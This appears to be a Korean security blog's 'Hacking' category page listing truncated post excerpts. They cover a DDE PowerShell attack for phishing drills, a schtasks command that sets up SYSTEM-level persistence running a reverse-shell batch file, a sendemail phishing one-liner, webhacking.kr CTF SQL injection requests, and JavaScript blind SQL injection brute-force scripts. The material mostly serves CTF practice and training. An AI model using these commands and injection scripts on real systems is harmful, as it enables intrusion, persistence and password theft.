본문 바로가기

Hacking

(65)
DDE, DDEAUTO Attack with powershell 아래 뉴스기사에 포함된 DDE 기능(본래 취약점은 아니고, 기능이라고 볼 수 있겠습니다. ) 관련 문의가 있어,Phishing 메일 발송훈련을 하며 정리한 내용을 보내드립니다. 약 한달 전부터 온라인에서 이슈가 되었던 DDE는 ‘Dynamic Data Exchange’의 줄임말로 ‘동적 데이터 교환’이라고도 합니다. MS Office 시리즈와 동적으로 데이터를 교환 할 수 있는 외부 연동용 API라고 보시면 되는데요. 이를 통해 인터넷과 통신하여 증권회사 주가API와 엑셀을 연동하여 주식거래를 할 수 도 있습니다. 동적으로 데이터를 받아오기 위해 인터넷 사용이 가능한데, 악성 스크립트를 다운받고 실행이 가능하게 됩니다. 이는 Phishing Mail 발송, APT공격에 사용할 만한 아주 좋은 기능이라 볼..
[Windows] schtask 사용법 schtasks /RU "NT Authority\SYSTEM" /Create /SC ONEVENT /MO "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4801]]" /EC Security /TN "cirruslogon" /TR "cmd /c (taskkill /F /IM powershell.exe rev.exe) & c:\cirrus_rev.bat" /F /RL highest
how to user sendemail Sendemail 명령어 사용법 root@kali:~/Desktop# cat oneline.html | sendemail -f "발신자 명 " -t 받는사람 메일주소 -s smtp.test.com:25 -u "메일제목" -o tls=no -o message-header="MIME-Version: 1.0" -o message-content-type=html -a ./첨부파일 -o message-char~set=utf-8
웹 취약점 조치 상세 가이드(KISA_홈페이지_취약점_진단_제거_가이드 2014) 웹 취약점 조치 상세 가이드 내용 사용시 KISA 출처 표기http://pdf2docx.com/ko/에서 변환
Webhacking.kr 29 POST /challenge/web/web-14/index.php HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveContent-Length: 262Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://webhacking.krUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36HTTPS: 1Content-Type:..
Webhacking.kr 35 GET /challenge/web/web-17/index.php?phone=1),(char(97,100,109,105,110),char(49,50,53,46,49,51,49,46,49,56,57,46,54,49),1 HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36HTTPS: 1..
Webhacking.kr 45 Blind SQL Injection문제이다. time=1 and (select length(Password) from FreeB0aRd)=9 테이블명은 페이지에 노출, 컬럼명은 dictionary = "0123456789abcdefghijklmnopqrstuvwxyz_"; password = ""; function go(query,n) { query = "0 or (select ascii(substr(Password,"+n+",1)) from FreeB0aRd)="+query document.cookie="time="+query; // sql injection 쿼리문을 time 쿠키에 대입 console.log(query); x = new XMLHttpRequest(); x.open("GET","inde..
blind sql injection dictionary = "abcdefghijklmnopqrstuvwxyz0123456789_"; // 패스워드로 추측되는 문자열 password = ""; // 획득한 패스워드를 저장하기 위한 변수 function go(query,n) // 패스워드로 추측되는 문자의 아스키 코드=query , substr의 길이=n { query = "2 and ascii(substr(pw,”+n+",1))="+query; // no 2의 패스워드를 한 바이트씩 대입하기 위한 변수 console.log(query); // 브루트포스 진행사항을 웹브라우저 콘솔에 출력 x = new XMLHttpRequest(); // request 전송을 위한 객체 생성 x.open("GET","index.php?no="+query,fa..